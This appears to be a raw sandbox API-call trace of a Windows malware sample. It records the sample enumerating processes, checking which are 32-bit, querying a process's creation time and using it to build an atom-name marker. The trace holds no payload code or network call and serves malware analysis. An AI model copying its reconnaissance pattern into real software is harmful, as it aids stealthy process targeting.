	[0070.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x220
	[0070.644] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.644] CloseHandle (hObject=0x220) returned 1
	[0070.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x220
	[0070.644] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.644] CloseHandle (hObject=0x220) returned 1
	[0070.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728998, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x220
	[0070.645] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.645] CloseHandle (hObject=0x220) returned 1
	[0070.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x220
	[0070.645] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.645] CloseHandle (hObject=0x220) returned 1
	[0070.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0070.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x220
	[0070.645] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.645] CloseHandle (hObject=0x220) returned 1
	[0070.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x220
	[0070.645] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.645] CloseHandle (hObject=0x220) returned 1
	[0070.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x220
	[0070.646] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.646] CloseHandle (hObject=0x220) returned 1
	[0070.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0070.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x220
	[0070.646] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.646] CloseHandle (hObject=0x220) returned 1
	[0070.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728978, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x220
	[0070.646] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.646] CloseHandle (hObject=0x220) returned 1
	[0070.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x220
	[0070.646] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.646] CloseHandle (hObject=0x220) returned 1
	[0070.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7289f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0070.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x220
	[0070.647] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.647] CloseHandle (hObject=0x220) returned 1
	[0070.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e770, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0070.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x220
	[0070.647] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.647] CloseHandle (hObject=0x220) returned 1
	[0070.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x220
	[0070.647] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.647] CloseHandle (hObject=0x220) returned 1
	[0070.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x220
	[0070.647] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.647] CloseHandle (hObject=0x220) returned 1
	[0070.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x220
	[0070.647] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.647] CloseHandle (hObject=0x220) returned 1
	[0070.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x220
	[0070.648] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.648] CloseHandle (hObject=0x220) returned 1
	[0070.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728a98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x220
	[0070.648] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.648] CloseHandle (hObject=0x220) returned 1
	[0070.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x220
	[0070.648] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.648] CloseHandle (hObject=0x220) returned 1
	[0070.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x220
	[0070.648] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.648] CloseHandle (hObject=0x220) returned 1
	[0070.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea40, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0070.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x220
	[0070.648] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.648] CloseHandle (hObject=0x220) returned 1
	[0070.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x220
	[0070.649] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.649] CloseHandle (hObject=0x220) returned 1
	[0070.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x220
	[0070.649] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.649] CloseHandle (hObject=0x220) returned 1
	[0070.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728878, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x220
	[0070.649] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.649] CloseHandle (hObject=0x220) returned 1
	[0070.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x220
	[0070.649] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.649] CloseHandle (hObject=0x220) returned 1
	[0070.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728a98, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x220
	[0070.649] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.649] CloseHandle (hObject=0x220) returned 1
	[0070.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72eb58, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0070.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x220
	[0070.649] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.650] CloseHandle (hObject=0x220) returned 1
	[0070.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e680, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0070.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x220
	[0070.650] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.650] CloseHandle (hObject=0x220) returned 1
	[0070.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x220
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.650] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.651] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0070.651] GetProcessTimes (in: hProcess=0x220, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.651] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.652] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetLastError () returned 0x5
	[0070.653] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.653] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0070.653] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.653] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0070.653] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0070.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0070.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x220
	[0070.654] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.654] CloseHandle (hObject=0x220) returned 1
	[0070.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e6a8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0070.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0070.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x220
	[0070.654] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.654] CloseHandle (hObject=0x220) returned 1
	[0070.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16a98) returned 0xc0000004
	[0070.733] VirtualAlloc (lpAddress=0x0, dwSize=0x16b98, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0070.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16b98, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0070.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0070.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0070.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0070.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0070.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0070.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
